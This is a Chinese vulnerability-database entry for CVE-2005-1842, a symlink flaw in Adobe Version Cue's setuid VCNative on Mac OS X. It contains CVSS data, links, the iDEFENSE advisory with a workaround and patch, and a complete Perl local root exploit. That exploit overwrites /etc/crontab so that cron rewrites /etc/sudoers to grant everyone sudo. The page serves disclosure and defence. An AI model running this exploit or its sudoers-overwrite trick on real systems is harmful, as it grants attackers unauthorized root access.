CVE-2005-1842
CVSS2.1
发布时间 :2005-08-24 00:00:00
修订时间 :2008-09-05 16:50:14
NMCOEPS    

[原文]VCNative for Adobe Version Cue 1.0 and 1.0.1, as used in Creative Suite 1.0 and 1.3, and when running on Mac OS X with Version Cue Workspace, creates temporary log files with predictable names, which allows local users to modify arbitrary files via a symlink attack.


[CNNVD]Adobe Version Cue for Mac OS X 本地权限提升漏洞(CNNVD-200508-278)

        Adobe Version Cue是Adobe Creative Suite中捆绑的为图像文件的编辑提供版本管理的工具。
        Adobe Version Cue for Mac OS X中存在两个权限提升漏洞:第一个漏洞(CAN-2005-1842)允许本地攻击者通过VCNative应用程序以超级用户权限覆盖任意文件,导致权限提升。第二个漏洞(CAN-2005-1843)允许本地攻击者通过VCNative应用程序以超级用户权限加载任意函数库。这也会导致权限提升。 拥有本地Mac OS X帐号的用户可以利用这个漏洞获得对本地文件和应用程序的管理员访问。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:adobe:version_cue:1.0.1Adobe Version Cue 1.0.1
cpe:/a:adobe:version_cue:1.0Adobe Version Cue 1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1842
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1842
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-278
(官方数据源) CNNVD

- 其它链接及资源

http://www.adobe.com/support/techdocs/327129.html
(VENDOR_ADVISORY)  CONFIRM  http://www.adobe.com/support/techdocs/327129.html
http://secunia.com/advisories/16541
(VENDOR_ADVISORY)  SECUNIA  16541
http://www.securityfocus.com/bid/14638
(UNKNOWN)  BID  14638
http://www.idefense.com/application/poi/display?id=297&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050829 Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability
http://securitytracker.com/id?1014776
(UNKNOWN)  SECTRACK  1014776

- 漏洞信息

Adobe Version Cue for Mac OS X 本地权限提升漏洞
低危 设计错误
2005-08-24 00:00:00 2005-10-20 00:00:00
本地  
        Adobe Version Cue是Adobe Creative Suite中捆绑的为图像文件的编辑提供版本管理的工具。
        Adobe Version Cue for Mac OS X中存在两个权限提升漏洞:第一个漏洞(CAN-2005-1842)允许本地攻击者通过VCNative应用程序以超级用户权限覆盖任意文件,导致权限提升。第二个漏洞(CAN-2005-1843)允许本地攻击者通过VCNative应用程序以超级用户权限加载任意函数库。这也会导致权限提升。 拥有本地Mac OS X帐号的用户可以利用这个漏洞获得对本地文件和应用程序的管理员访问。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

- 漏洞信息 (1185)

Adobe Version Cue 1.0/1.0.1 Local Root Exploit (OSX) (EDBID:1185)
osX local
2005-08-30 Verified
0 vade79
N/A [点击下载]
#!/usr/bin/perl
#
# Adobe Version Cue VCNative[OSX]: local root exploit.
# 
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
# 
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
#
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
"WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
$vcn_pid=($$ + 1);
$vcn_cwd="/tmp";
$vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid\.log";
$ovrfile="/etc/crontab";
$ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
pexit("VCNative binary doesn't appear to exist");
}
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
@ast=stat($ovrfile);
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
unlink($vcn_tempfile);
@st=stat($ovrfile);
if($st[7]==$ast[7]&&$st[9]==$ast[9]){
pexit("$ovrfile was not modified, exploit failed");
}
else{
print("[*] $ovrfile was overwritten successfully...\n");
}
print("[*] waiting for crontab to change /etc/sudoers...\n");
@ast=@st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
sleep(1);
@ast=stat("/etc/sudoers");
}
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");
exit(0);

# milw0rm.com [2005-08-30]
		

- 漏洞信息 (F39709)

iDEFENSE Security Advisory 2005-08-29.2 (PacketStormID:F39709)
2005-08-31 00:00:00
vade79,iDefense Labs  idefense.com
advisory,arbitrary,local,root,code execution
CVE-2005-1842
[点击下载]

iDEFENSE Security Advisory - Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges. Version Cue includes a setuid root application named VCNative which is vulnerable to a symlink attack. The vulnerability specifically exists due to the use of predictable log file names. VCNative uses a format such as VCNative-[pid].log for the filename and stores the file in the current working directory. Attackers can easily predict the created filename and supply user-controlled data via the -host and - port options. A carefully supplied value can cause a crafted log file to be written. Crafted strings written to root-owned files can lead to arbitrary code execution with root privileges.

Adobe Version Cue VCNative Arbitrary File Overwrite Vulnerability

iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=297&type=vulnerabilities
August 29, 2005

I. BACKGROUND

Adobe Version Cue is a software version tracking system for Adobe 
products distributed with Adobe Creative Suite and select Adobe 
products. 

II. DESCRIPTION

Local exploitation of a design error in Adobe Systems, Inc. Version Cue 
allows local attackers to gain root privileges. Version Cue includes a
setuid root application named VCNative which is vulnerable to a symlink
attack. The vulnerability specifically exists due to the use of
predictable log file names. VCNative uses a format such as
"VCNative-[pid].log" for the filename and stores the file in the
current working directory. Attackers can easily predict the created
filename and supply user-controlled data via the "-host" and "- port"
options. A carefully supplied value can cause a crafted "log file" to
be written. Crafted strings written to root-owned files can lead to
arbitrary code execution with root privileges.

III. ANALYSIS

Successful exploitation allows local attackers to write to arbitrary 
files with user-supplied data. Data written to the linked file will 
include some corrupted data as well as user-suppplied data, potentially 
corrupting a file completely and preventing the execution of system 
commands. In addition, a carefully crafted input value can be used in 
conjunction with standard system tools such as cron to gain root 
privileges.

A workaround solution has been provided for this vulnerability. In 
addition, the vulnerability affects only the Apple OS X platform and is 
only installed with Adobe Creative Suite or other Adobe products. 

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in 
Adobe Version Cue version 1 on the Apple OS X platform.

V. WORKAROUND

As a workaround solution, remove the setuid bit from the VCNative 
binary and execute the application as a root user when necessary.

VI. VENDOR RESPONSE

Adobe Version Cue Update 2 which addresses this vulnerability, is
available for download at:

 http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

The vendor advisory for this vulnerability is located at:

 http://www.adobe.com/support/techdocs/327129.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1842 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/27/2005 Initial vendor notification
06/27/2005 Initial vendor response
08/29/2005 Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

18921
Adobe Version Cue VCNative Symlink Arbitrary File Overwrite
Local Access Required Race Condition
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-11 Unknow
2005-09-04 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Adobe Version Cue for Mac OS X Local Privilege Escalation Vulnerabilities
Design Error 14638
No Yes
2005-08-23 12:00:00 2009-07-12 05:06:00
Discovery is credited to vade79.

- 受影响的程序版本

Adobe Version Cue 1.0.1
+ Adobe Creative Suite 1.3
Adobe Version Cue 1.0
+ Adobe Creative Suite 1.0

- 漏洞讨论

Adobe Version Cue for Mac OS X is prone to two local privilege-escalation vulnerabilities that could allow a local attacker to load arbitrary libraries or overwrite files.

The first issue (CAN-2005-1842) allows a local user to overwrite arbitrary files in the context of the superuser through the VCNative application. This vulnerability permits privilege escalation, because files may be overwritten with custom data.

The second issue (CAN-2005-1843) allows a local user to load arbitrary libraries in the context of the superuser through the VCNative application. This will permit privilege escalation.

Adobe Version Cue 1.0 and 1.0.1 are vulnerable to this issue.

- 漏洞利用

The following exploit code is available:

- 解决方案

Adobe has released a fix:


Adobe Version Cue 1.0

Adobe Version Cue 1.0.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站